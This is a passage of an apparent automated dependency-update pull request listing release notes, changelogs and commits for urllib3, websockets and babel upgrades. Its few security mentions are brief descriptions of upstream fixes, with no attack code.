release.\u003c/p\u003e\n\u003ch2\u003e1.26.18\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMade body stripped from HTTP requests changing the request method to GET after HTTP 303 \u0026quot;See Other\u0026quot; redirect responses. (GHSA-g4mx-q9vg-27p4)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.17\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eCookie\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e. (GHSA-v845-jxx5-vc9f)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.16\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed thread-safety issue where accessing a \u003ccode\u003ePoolManager\u003c/code\u003e with many distinct origins would cause connection pools to be closed while requests are in progress (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2954\"\u003e#2954\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix socket timeout value when HTTPConnection is reused (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2645\"\u003eurllib3/urllib3#2645\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove \u0026quot;!\u0026quot; character from the unreserved characters in IPv6 Zone ID parsing (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2899\"\u003eurllib3/urllib3#2899\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix IDNA handling of 'x80' byte (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2901\"\u003eurllib3/urllib3#2901\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed parsing of port 0 (zero) returning None, instead of 0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2850\"\u003e#2850\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved deprecated \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e calls in \u003ccode\u003eurllib3.contrib\u003c/code\u003e module.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e and \u003ccode\u003eHTTPResponse.getheader()\u003c/code\u003e methods.\u003c/li\u003e\n\u003cli\u003eFixed an issue where parsing a URL with leading zeroes in the port would be rejected even when the port number after removing the zeroes was valid.\u003c/li\u003e\n\u003cli\u003eFixed a deprecation warning when using cryptography v39.0.0.\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003e\u0026lt;4\u003c/code\u003e in the \u003ccode\u003eRequires-Python\u003c/code\u003e packaging metadata field.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eurllib3[secure]\u003c/code\u003e extra and the \u003ccode\u003eurllib3.contrib.pyopenssl\u003c/code\u003e module. Both will be removed in v2.x. See this \u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2680\"\u003eGitHub issue\u003c/a\u003e for justification and info on how to migrate.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.11\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eIf you or your organization rely on urllib3 consider supporting us via \u003ca href=\"https://github.com/sponsors/urllib3\"\u003eGitHub Sponsors\u003c/a\u003e.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003e:warning: \u003cstrong\u003eurllib3 v2.0 will drop support for Python 2\u003c/strong\u003e: \u003ca href=\"https://urllib3.readthedocs.io/en/latest/v2-roadmap.html\"\u003eRead more in the v2.0 Roadmap\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed an issue where reading more than 2 GiB in a call to HTTPResponse.read would raise an OverflowError on Python 3.9 and earlier.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.26.19 (2024-06-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eProxy-Authorization\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eFixed handling of OpenSSL 3.2.0 new error message for misconfiguring an HTTP proxy as HTTPS. (\u003ccode\u003e[#3405](https://github.com/urllib3/urllib3/issues/3405) \u0026lt;https://github.com/urllib3/urllib3/issues/3405\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.18 (2023-10-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eMade body stripped from HTTP requests changing the request method to GET after HTTP 303 \u0026quot;See Other\u0026quot; redirect responses.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.17 (2023-10-02)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eCookie\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e. (\u003ccode\u003e[#3139](https://github.com/urllib3/urllib3/issues/3139) \u0026lt;https://github.com/urllib3/urllib3/pull/3139\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.16 (2023-05-23)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed thread-safety issue where accessing a \u003ccode\u003ePoolManager\u003c/code\u003e with many distinct origins\nwould cause connection pools to be closed while requests are in progress (\u003ccode\u003e[#2954](https://github.com/urllib3/urllib3/issues/2954) \u0026lt;https://github.com/urllib3/urllib3/pull/2954\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.15 (2023-03-10)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix socket timeout value when \u003ccode\u003eHTTPConnection\u003c/code\u003e is reused (\u003ccode\u003e[#2645](https://github.com/urllib3/urllib3/issues/2645) \u0026lt;https://github.com/urllib3/urllib3/issues/2645\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemove \u0026quot;!\u0026quot; character from the unreserved characters in IPv6 Zone ID parsing\n(\u003ccode\u003e[#2899](https://github.com/urllib3/urllib3/issues/2899) \u0026lt;https://github.com/urllib3/urllib3/issues/2899\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFix IDNA handling of '\\x80' byte (\u003ccode\u003e[#2901](https://github.com/urllib3/urllib3/issues/2901) \u0026lt;https://github.com/urllib3/urllib3/issues/2901\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.14 (2023-01-11)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed parsing of port 0 (zero) returning None, instead of 0. (\u003ccode\u003e[#2850](https://github.com/urllib3/urllib3/issues/2850) \u0026lt;https://github.com/urllib3/urllib3/issues/2850\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved deprecated getheaders() calls in contrib module. Fixed the type hint of \u003ccode\u003ePoolKey.key_retries\u003c/code\u003e by adding \u003ccode\u003ebool\u003c/code\u003e to the union. (\u003ccode\u003e[#2865](https://github.com/urllib3/urllib3/issues/2865) \u0026lt;https://github.com/urllib3/urllib3/issues/2865\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.13 (2022-11-23)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e and \u003ccode\u003eHTTPResponse.getheader()\u003c/code\u003e methods.\u003c/li\u003e\n\u003cli\u003eFixed an issue where parsing a URL with leading zeroes in the port would be rejected\neven when the port number after removing the zeroes was valid.\u003c/li\u003e\n\u003cli\u003eFixed a deprecation warning when using cryptography v39.0.0.\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003e\u0026lt;4\u003c/code\u003e in the \u003ccode\u003eRequires-Python\u003c/code\u003e packaging metadata field.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.12 (2022-08-22)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eurllib3[secure]\u003c/code\u003e extra and the \u003ccode\u003eurllib3.contrib.pyopenssl\u003c/code\u003e module.\nBoth will be removed in v2.x. See this \u003ccode\u003eGitHub issue \u0026lt;https://github.com/urllib3/urllib3/issues/2680\u0026gt;\u003c/code\u003e_\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d9d85c88aa644af56d5e129634e750ce76e1a765\"\u003e\u003ccode\u003ed9d85c8\u003c/code\u003e\u003c/a\u003e Release 1.26.19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8528b63b6fe5cfd7b21942cf988670de68fcd8c0\"\u003e\u003ccode\u003e8528b63\u003c/code\u003e\u003c/a\u003e [1.26] Fix downstream tests (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3409\"\u003e#3409\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/40b6d1605814dd1db0a46e202d6e56f2e4c9a468\"\u003e\u003ccode\u003e40b6d16\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-34jh-p97f-mpxf\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/29cfd02f66376c61bd20f1725477925106321f68\"\u003e\u003ccode\u003e29cfd02\u003c/code\u003e\u003c/a\u003e Fix handling of OpenSSL 3.2.0 new error message \u0026quot;record layer failure\u0026quot; (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3405\"\u003e#3405\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/b60064388302f54a3455259ddab121618650a154\"\u003e\u003ccode\u003eb600643\u003c/code\u003e\u003c/a\u003e [1.26] Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3404\"\u003e#3404\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7e2d3890926d4788e219f63e2e36fbeb8714827f\"\u003e\u003ccode\u003e7e2d389\u003c/code\u003e\u003c/a\u003e [1.26] Fix running CPython 2.7 tests in CI (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3137\"\u003e#3137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9c2c2307dd1d6af504e09aac0326d86ee3597a0b\"\u003e\u003ccode\u003e9c2c230\u003c/code\u003e\u003c/a\u003e Release 1.26.18 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3159\"\u003e#3159\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36\"\u003e\u003ccode\u003eb594c5c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-g4mx-q9vg-27p4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/944f0eb134485f41bc531be52de12ba5a37bca73\"\u003e\u003ccode\u003e944f0eb\u003c/code\u003e\u003c/a\u003e [1.26] Use vendored six in urllib3.contrib.securetransport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c9016bf464751a02b7e46f8b86504f47d4238784\"\u003e\u003ccode\u003ec9016bf\u003c/code\u003e\u003c/a\u003e Release 1.26.17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.25.9...1.26.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `websockets` from 8.1 to 9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-websockets/websockets/releases\"\u003ewebsockets's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e9.1\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://websockets.readthedocs.io/en/stable/project/changelog.html\"\u003ehttps://websockets.readthedocs.io/en/stable/project/changelog.html\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003e9.0.2\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://websockets.readthedocs.io/en/stable/project/changelog.html\"\u003ehttps://websockets.readthedocs.io/en/stable/project/changelog.html\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003e9.0.1\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://websockets.readthedocs.io/en/stable/project/changelog.html\"\u003ehttps://websockets.readthedocs.io/en/stable/project/changelog.html\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003e9.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://websockets.readthedocs.io/en/stable/project/changelog.html\"\u003ehttps://websockets.readthedocs.io/en/stable/project/changelog.html\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-websockets/websockets/blob/9.1/docs/changelog.rst\"\u003ewebsockets's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e9.1\n...\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eMay 27, 2021\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003e.. note::\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e**Version 9.1 fixes a security issue introduced in version 8.0.**\n\u003cp\u003eVersion 8.0 was vulnerable to timing attacks on HTTP Basic Auth passwords.\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cp\u003e9.0.2\n.....\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eMay 15, 2021\u003c/em\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRestored compatibility of \u003ccode\u003epython -m websockets\u003c/code\u003e with Python \u0026lt; 3.9.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRestored compatibility with mypy.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e9.0.1\n.....\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eMay 2, 2021\u003c/em\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed issues with the packaging of the 9.0 release.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e9.0\n...\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eMay 1, 2021\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003e.. note::\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e**Version 9.0 moves or deprecates several APIs.**\n\u003cp\u003eAliases provide backwards compatibility for all previously public APIs.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e:class:\u003ccode\u003e~datastructures.Headers\u003c/code\u003e and\u003cbr /\u003e\n:exc:\u003ccode\u003e~datastructures.MultipleValuesError\u003c/code\u003e were moved from\u003cbr /\u003e\n\u003ccode\u003ewebsockets.http\u003c/code\u003e to :mod:\u003ccode\u003ewebsockets.datastructures\u003c/code\u003e. If you're using\u003cbr /\u003e\nthem, you should adjust the import path.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eThe \u003ccode\u003eclient\u003c/code\u003e, \u003ccode\u003eserver\u003c/code\u003e, \u003ccode\u003eprotocol\u003c/code\u003e, and \u003ccode\u003eauth\u003c/code\u003e modules were\u003cbr /\u003e\nmoved from the \u003ccode\u003ewebsockets\u003c/code\u003e package to \u003ccode\u003ewebsockets.legacy\u003c/code\u003e\u003cbr /\u003e\nsub-package, as part of an upcoming refactoring. Despite the name,\u003cbr /\u003e\nthey're still fully supported. The refactoring should be a transparent\u003cbr /\u003e\nupgrade for most uses when it's available. The legacy implementation\u003cbr /\u003e\nwill be preserved according to the \u003ccode\u003ebackwards-compatibility policy\u003c/code\u003e_.\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/d0f328888f3e695aa64d78dcf48af4ece219221b\"\u003e\u003ccode\u003ed0f3288\u003c/code\u003e\u003c/a\u003e Bump version number.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/547a26b685d08cac0aa64e5e65f7867ac0ea9bc0\"\u003e\u003ccode\u003e547a26b\u003c/code\u003e\u003c/a\u003e Use constant-time comparison for passwords.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/a14226afb77b524c2ced7d649ac7420a14992716\"\u003e\u003ccode\u003ea14226a\u003c/code\u003e\u003c/a\u003e Bump version number.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/8900c13d3234c8ae87b0d852e849eaf6bf7cf8b7\"\u003e\u003ccode\u003e8900c13\u003c/code\u003e\u003c/a\u003e Add mypy to dictionary.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/0713dbf2d37a8c2c071d8479a6768dd3d3c7dacf\"\u003e\u003ccode\u003e0713dbf\u003c/code\u003e\u003c/a\u003e Add test coverage.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/b99c4fe390a22cc846ce550a29f2c9841e99660d\"\u003e\u003ccode\u003eb99c4fe\u003c/code\u003e\u003c/a\u003e Restore real imports for compatibility with mypy.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/e44e085e030d186c7bb9822becfbb5423aefe971\"\u003e\u003ccode\u003ee44e085\u003c/code\u003e\u003c/a\u003e Use relative imports everywhere, for consistency.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/70fadbf97c5a117ca13f6c8f4f111ba5025f3c94\"\u003e\u003ccode\u003e70fadbf\u003c/code\u003e\u003c/a\u003e Restore compatibility with Python \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/217ac2d19174c6f01d9524648eb4058985f72754\"\u003e\u003ccode\u003e217ac2d\u003c/code\u003e\u003c/a\u003e Fix broken link.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-websockets/websockets/commit/fc176f462b6a5ef4f470df415780b09fed5da7c1\"\u003e\u003ccode\u003efc176f4\u003c/code\u003e\u003c/a\u003e Bump version number.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/python-websockets/websockets/compare/8.1...9.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `babel` from 2.8.0 to 2.9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/releases\"\u003ebabel's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThe internal locale-data loading functions now validate the name of the locale file to be loaded and only allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003ch1\u003eUpcoming version support changes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Use CLDR 37 – Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/734\"\u003e#734\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNumbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/726\"\u003e#726\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eImport: Simplify iteration code in \u0026quot;import_cldr.py\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eImport: Stop using deprecated ElementTree methods \u0026quot;getchildren()\u0026quot; and \u0026quot;getiterator()\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eMessages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eMessages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eTests: fix tests when using Python 3.9 – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eTests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\u003c/li\u003e\n\u003cli\u003eTests: Support Py.test 6.x – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eUtilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/724\"\u003e#724\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUtilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocumentation\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate parse_number comments – Brad Martin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/708\"\u003e#708\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd \u003cstrong\u003eiter\u003c/strong\u003e to Catalog documentation – \u003ca href=\"https://github.com/CyanNani123\"\u003e\u003ccode\u003e@​CyanNani123\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.8.1\u003c/h2\u003e\n\u003cp\u003eThis patch version only differs from 2.8.0 in that it backports in \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/752\"\u003e#752\u003c/a\u003e.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/blob/master/CHANGES.rst\"\u003ebabel's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* The internal locale-data loading functions now validate the name of the locale file to be loaded and only\n  allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003cp\u003eUpcoming version support changes\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eImprovements\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* CLDR: Use CLDR 37 – Aarni Koskela (:gh:`734`)\n* Dates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (:gh:`741`)\n* Numbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (:gh:`726`)\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Dates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\n* Import: Simplify iteration code in \u0026amp;quot;import_cldr.py\u0026amp;quot; – Felix Schwarz\n* Import: Stop using deprecated ElementTree methods \u0026amp;quot;getchildren()\u0026amp;quot; and \u0026amp;quot;getiterator()\u0026amp;quot; – Felix Schwarz\n* Messages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\n* Messages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\n* Tests: fix tests when using Python 3.9 – Felix Schwarz\n* Tests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\n* Tests: Support Py.test 6.x – Aarni Koskela\n* Utilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (:gh:`724`)\n* Utilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\n\nDocumentation\n\u0026lt;/code\u0026gt;\u0026lt;/pre\u0026gt;\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;Update parse_number comments – Brad Martin (:gh:\u0026lt;code\u0026gt;708\u0026lt;/code\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Add \u0026lt;strong\u0026gt;iter\u0026lt;/strong\u0026gt; to Catalog documentation – \u0026lt;a href=\u0026quot;https://github.com/CyanNani123\u0026quot;\u0026gt;\u0026lt;code\u0026gt;@​CyanNani123\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;h2\u0026gt;Version 2.8.1\u0026lt;/h2\u0026gt;\n\u0026lt;p\u0026gt;This is solely a patch release to make running tests on Py.test 6+ possible.\u0026lt;/p\u0026gt;\n\u0026lt;p\u0026gt;Bugfixes\u0026lt;/p\u0026gt;\n\u0026lt;!-- raw HTML omitted --\u0026gt;\n\u0026lt;/blockquote\u0026gt;\n\u0026lt;p\u0026gt;... (truncated)\u0026lt;/p\u0026gt;\n\u0026lt;/details\u0026gt;\n\u0026lt;details\u0026gt;\n\u0026lt;summary\u0026gt;Commits\u0026lt;/summary\u0026gt;\n\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/a99fa2474c808b51ebdabea18db871e389751559\u0026quot;\u0026gt;\u0026lt;code\u0026gt;a99fa24\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Use 2.9.0's setup.py for 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/60b33e083801109277cb068105251e76d0b7c14e\u0026quot;\u0026gt;\u0026lt;code\u0026gt;60b33e0\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Become 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/412015ef642bfcc0d8ba8f4d05cdbb6aac98d9b3\u0026quot;\u0026gt;\u0026lt;code\u0026gt;412015e\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/782\u0026quot;\u0026gt;#782\u0026lt;/a\u0026gt; from python-babel/locale-basename\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a 